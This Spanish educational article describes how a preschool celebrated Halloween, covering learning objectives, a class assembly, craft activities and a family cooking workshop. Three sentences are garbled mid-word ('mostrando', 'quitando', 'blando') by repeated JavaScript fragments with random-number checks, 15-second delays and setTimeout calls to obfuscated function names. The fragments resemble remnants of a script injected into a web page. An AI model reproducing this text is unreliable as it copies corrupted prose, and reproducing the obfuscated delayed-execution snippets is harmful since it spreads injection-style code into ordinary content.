HALLOWEEN LLEGA A LAS AULAS. EXPERIENCIA DIDÁCTICA

Autora: Manuela González Castaño

Es cada vez más común celebrar Halloween, una fiesta frecuente en países anglosajones que se celebra principalmente la noche del 31 de octubre, pero que, poco a poco, se ha popularizado también en otros países, como el nuestro. Por esta razón, se decidió celebrar esta fiesta en nuestro centro de Educación Infantil, porque, además de ser divertido y motivador para los niños, sirve para enseñarles otras culturas diferentes a la nuestra, puesto que hoy día encontramos en nuestras aulas diversidad de nacionalidades y culturas.

En primer lugar, nos propusimos una serie de objetivos, teniendo en cuenta las capacidades del alumnado, sus necesidades e intereses:

  1. Conocer y apreciar Halloween como fiesta típica de otros países y culturas, mostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actitudes de interés y respeto.
  2. Desarrollar la imaginación
  3. Promover actitudes y hábitos de colaboración y ayuda entre compañeros.
  4. Desarrollar destrezas manuales y motrices.
  5. Aprender pautas elementales de convivencia y relación social
  6. Integrar a las familias en las diferentes actividades del centro escolar.

En la asamblea les explicamos a los niños la historia de Halloween, sus orígenes, cómo se celebra y cómo íbamos a organizarla entre todos para finalizar con una gran fiesta. Además, les fuimos quitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el miedo que pudiera existir entre los pequeños hacia los diversos personajes típicos de la fiesta: fantasmas, murciélagos…

Durante una semana, llevamos a cabo varias actividades:

-           En el rincón de arte, elaboramos todo tipo de elementos para decorar: brujas, fantasmas, calabazas, murciélagos, telarañas, guirnaldas, marionetas…todo ello con diferentes materiales de diversas texturas y colores, con la finalidad de que los pequeños vayan adquiriendo conceptos como duro, blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, suave, áspero, etc. Además, elaboramos caretas y disfraces para vestirnos el día de la gran fiesta: gorros y vestidos de brujas para las niñas y capas de vampiros para los niños.

-                     Taller de cocina: contamos con la colaboración de las familias de los alumnos, que ayudaron a los niños en la preparación de deliciosas tartas con forma de calabaza o serpiente, dulces con forma de araña, brujas dulces, etc. Tanto niños como padres disfrutaron muchísimo y, además, fomentamos la participación de la familia en el aula.